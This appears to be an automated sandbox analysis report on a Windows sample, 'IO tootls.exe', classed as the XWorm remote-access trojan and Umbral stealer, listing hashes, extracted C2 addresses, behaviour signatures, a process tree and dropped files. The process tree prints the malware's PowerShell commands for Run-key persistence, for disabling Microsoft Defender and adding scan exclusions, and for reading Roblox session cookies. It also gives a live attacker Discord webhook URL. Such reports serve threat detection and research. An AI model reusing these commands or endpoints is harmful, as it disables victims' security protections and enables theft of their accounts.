Overview

overview

10

Static

static

3

IO tootls.exe

windows7-x64

10

IO tootls.exe

windows10-1703-x64

10

IO tootls.exe

windows10-2004-x64

10

IO tootls.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    263s
  • max time network
    300s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-02-2024 05:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IO tootls.exe

  • Size

    207KB

  • MD5

    5afd3e0ac701a47f48772af3c5eb54d1

  • SHA1

    ac20c5db48d258c9f00845fb3508e90d4f3187ae

  • SHA256

    6060fb48cc4a123bb9a64f8854f8c5253dc125194469f2e4b0821d4248f14c3c

  • SHA512

    24329cf850d5578c13799f093394c619ece7c0ba36a79fc57084e9c1da38d119e39bc27e5e91de12c1426bf1fe7131060ce3a20fc566d90525a99e4da914337b

  • SSDEEP

    6144:rJX6OJ0PS7eEcJWIUPjw7B5oZKH4FIlhuc4w1VVcKGwO9t:94SqE4q7coY4ShucV43

Score
10/10
umbralxwormpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

hai1723rat-60039.portmap.io:60039

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1211176678466916392/99VOwP9dc7iQz2Is-QlZ872KZaiUa4r3sEvXqZ6NmS-fFuTojiUjOg2SjIUWBCIoPNFA

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\IO tootls.exe
    "C:\Users\Admin\AppData\Local\Temp\IO tootls.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'updatee';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'updatee' -Value '"C:\Windows\.NET\netloader.exe"' -PropertyType 'String'
      2⤵
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4152
    • C:\Users\Admin\AppData\Local\Temp\IO tootls.exe
      #cmd
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2188
      • C:\Users\Admin\AppData\Local\Temp\systemload.exe
        "C:\Users\Admin\AppData\Local\Temp\systemload.exe"
        3⤵
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2436
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemload.exe'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2248
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemload.exe'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:872
      • C:\Users\Admin\AppData\Local\Temp\controllloader.exe
        "C:\Users\Admin\AppData\Local\Temp\controllloader.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\controllloader.exe'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2988
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3588
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3756
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3300
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3740
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
            PID:2752
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2344
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            4⤵
            • Detects videocard installed
            PID:4208
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\start.cmd" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2100
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\'"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1904
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:1676

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      627073ee3ca9676911bee35548eff2b8

      SHA1

      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

      SHA256

      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

      SHA512

      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IO tootls.exe.log
      Filesize

      321B

      MD5

      f67fe6df08d4663b0496e9a0cc94640a

      SHA1

      d07396cfcf0c6ac3baef97ce55da213a87923095

      SHA256

      f7ebc9ed3149ecb8a190fbcb1d4e5524e1bdd0e603ab695d8ebff41da59fa2d4

      SHA512

      4f92d4a762675eee10856d08921c75cf3f9a6f92e94c21f0ef0aa5147f9a84e168e6cdb001e9a66986b0cff1c454d50a5b44715676875cf5343a3cbc5c0d5e31

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      61ecf056210295f7de28e195258731b9

      SHA1

      53d2b50327ef84e68b914bc937f50b0e3e6b5895

      SHA256

      9cb8cfca6ac40e91cb8928b58a37868b844c9425644451e5d8a2290b5aa7be8d

      SHA512

      ce30fbc0ab11223cc5aad874c848a57c0d84b108914e178e782e45b2aeb1deb40292d9e43c7839c11cbd18264c4f2451de2edbbef5dd6dc4e1b32a7d787dbf61

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      1a9fa92a4f2e2ec9e244d43a6a4f8fb9

      SHA1

      9910190edfaccece1dfcc1d92e357772f5dae8f7

      SHA256

      0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

      SHA512

      5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      948B

      MD5

      441a842138038e6385e430a90d7ea608

      SHA1

      7b3712d2cdd37e10ee9b3994131ee5175e920f01

      SHA256

      47592f3324179912d3bdba336b9e75568c2c5f1a9fb37c1ba9f0db9df822164c

      SHA512

      9dbddc3216f2a132ae3961b3aeac2c5b8828dcc9292f6c5bf1171c47453aa8687f92658818d771413492c0ea565e9ede17b9c03e427af9dc2ac21a78369a6666

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      7332074ae2b01262736b6fbd9e100dac

      SHA1

      22f992165065107cc9417fa4117240d84414a13c

      SHA256

      baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

      SHA512

      4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      e07eea85a8893f23fb814cf4b3ed974c

      SHA1

      8a8125b2890bbddbfc3531d0ee4393dbbf5936fe

      SHA256

      83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea

      SHA512

      9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4mgycldb.sax.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\controllloader.exe
      Filesize

      286KB

      MD5

      e41a0fa0c1e39af92d22090d4df61a1f

      SHA1

      c971a4089b1ab116c34b5ab0dc54d9977f86e834

      SHA256

      c0966533c2bc8c8b9ee176d774eae0ca1c4d6fe6e8efe5d87d4cac8c04b84372

      SHA512

      d42798fa9115f3c3775798a26ef7c28e4f173bdc2b74884b01a4e7905b17a2da09508766a626652eec3622a15a891b6859f4e9a422eb052a59b3fd3eafe1a7fd

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\start.cmd
      Filesize

      93B

      MD5

      f960abd9684a879e8eca03b8c864ea96

      SHA1

      fb4b9a9b40af84ae46b70bb40ac3e1f45e4b4ad3

      SHA256

      7389178da21f4e2d4ef73ab199b7beeb97247a6c1afec3f3c48a7f561cbfaf90

      SHA512

      2c6267ab25c364c5b13059ed593bb47dfae586ae7b1411634efa3f45aaf07b4d8f491fe93bfd34482a1250c955f1e8c27e1afa0460672a5e9584ebe007ab2054

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\systemload.exe
      Filesize

      130KB

      MD5

      352a162df9ca5605e1a1910c7a24cb7c

      SHA1

      4b4ed1c740a03c15eb47d875b65c76941debcaf7

      SHA256

      87e9d9a7a197a0cd483f8e73f307af53a7518cabc001257c8235743181b9a7b8

      SHA512

      0c2bae3f66748cc3448eaf60c5079ae3afba6d585e19e54857f7c152a1bd69c3b8e3df7feb413f3eb2df0f2bc01b44be5bcdefd5427af154a221f2b808a2399d

      Download Submit

    • memory/888-102-0x000001575E040000-0x000001575E050000-memory.dmp

      Filesize

      64KB

      Download

    • memory/888-117-0x000001575E040000-0x000001575E050000-memory.dmp

      Filesize

      64KB

      Download

    • memory/888-101-0x00007FFEDCEF0000-0x00007FFEDD9B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/888-103-0x000001575E040000-0x000001575E050000-memory.dmp

      Filesize

      64KB

      Download

    • memory/888-130-0x00007FFEDCEF0000-0x00007FFEDD9B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/888-104-0x000001575E010000-0x000001575E032000-memory.dmp

      Filesize

      136KB

      Download

    • memory/888-113-0x000001575E040000-0x000001575E050000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1904-121-0x0000000070460000-0x00000000704AC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/1904-90-0x0000000004B70000-0x0000000004B80000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1904-131-0x0000000004B70000-0x0000000004B80000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1904-146-0x0000000007510000-0x0000000007525000-memory.dmp

      Filesize

      84KB

      Download

    • memory/1904-89-0x0000000074280000-0x0000000074A31000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1904-132-0x0000000004B70000-0x0000000004B80000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1904-91-0x0000000004B70000-0x0000000004B80000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2188-12-0x0000000074280000-0x0000000074A31000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2188-6-0x0000000000400000-0x0000000000436000-memory.dmp

      Filesize

      216KB

      Download

    • memory/2188-83-0x0000000074280000-0x0000000074A31000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2188-48-0x00000000056E0000-0x000000000577C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/2188-51-0x0000000005A10000-0x0000000005A20000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2372-4-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2372-11-0x0000000074280000-0x0000000074A31000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2372-2-0x0000000005350000-0x00000000058F6000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2372-1-0x0000000074280000-0x0000000074A31000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2372-0-0x0000000000390000-0x00000000003CA000-memory.dmp

      Filesize

      232KB

      Download

    • memory/2436-77-0x00000000006C0000-0x00000000006E6000-memory.dmp

      Filesize

      152KB

      Download

    • memory/2436-147-0x00007FFEDCEF0000-0x00007FFEDD9B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2436-84-0x00007FFEDCEF0000-0x00007FFEDD9B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2988-134-0x00007FFEDCEF0000-0x00007FFEDD9B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2988-150-0x00007FFEDCEF0000-0x00007FFEDD9B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2988-148-0x0000027EF5A60000-0x0000027EF5A70000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2988-136-0x0000027EF5A60000-0x0000027EF5A70000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2988-135-0x0000027EF5A60000-0x0000027EF5A70000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4152-29-0x000000007F0F0000-0x000000007F100000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4152-17-0x0000000005760000-0x00000000057C6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4152-46-0x0000000007290000-0x0000000007326000-memory.dmp

      Filesize

      600KB

      Download

    • memory/4152-45-0x0000000007080000-0x000000000708A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4152-44-0x0000000007000000-0x000000000701A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4152-43-0x0000000007640000-0x0000000007CBA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/4152-100-0x0000000007390000-0x00000000073B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4152-42-0x0000000006EC0000-0x0000000006F64000-memory.dmp

      Filesize

      656KB

      Download

    • memory/4152-41-0x00000000048D0000-0x00000000048E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4152-40-0x0000000006290000-0x00000000062AE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4152-31-0x0000000070460000-0x00000000704AC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4152-30-0x0000000006E80000-0x0000000006EB4000-memory.dmp

      Filesize

      208KB

      Download

    • memory/4152-116-0x0000000074280000-0x0000000074A31000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4152-61-0x0000000007350000-0x000000000736A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4152-28-0x0000000005D00000-0x0000000005D4C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4152-27-0x0000000005CB0000-0x0000000005CCE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4152-26-0x00000000057D0000-0x0000000005B27000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4152-87-0x0000000007340000-0x0000000007348000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4152-16-0x00000000056F0000-0x0000000005756000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4152-15-0x0000000004E10000-0x0000000004E32000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4152-5-0x00000000024D0000-0x0000000002506000-memory.dmp

      Filesize

      216KB

      Download

    • memory/4152-7-0x0000000004F10000-0x000000000553A000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/4152-47-0x0000000007210000-0x0000000007221000-memory.dmp

      Filesize

      68KB

      Download

    • memory/4152-14-0x00000000048D0000-0x00000000048E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4152-8-0x0000000074280000-0x0000000074A31000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4152-52-0x0000000007240000-0x000000000724E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/4152-53-0x0000000007250000-0x0000000007265000-memory.dmp

      Filesize

      84KB

      Download

    • memory/4152-13-0x00000000048D0000-0x00000000048E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4488-153-0x00000133E9AD0000-0x00000133E9B20000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4488-152-0x00000133E9A50000-0x00000133E9AC6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4488-80-0x00000133CF270000-0x00000133CF2BE000-memory.dmp

      Filesize

      312KB

      Download

    • memory/4488-85-0x00000133E98C0000-0x00000133E98D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4488-86-0x00007FFEDCEF0000-0x00007FFEDD9B2000-memory.dmp

      Filesize

      10.8MB

      Download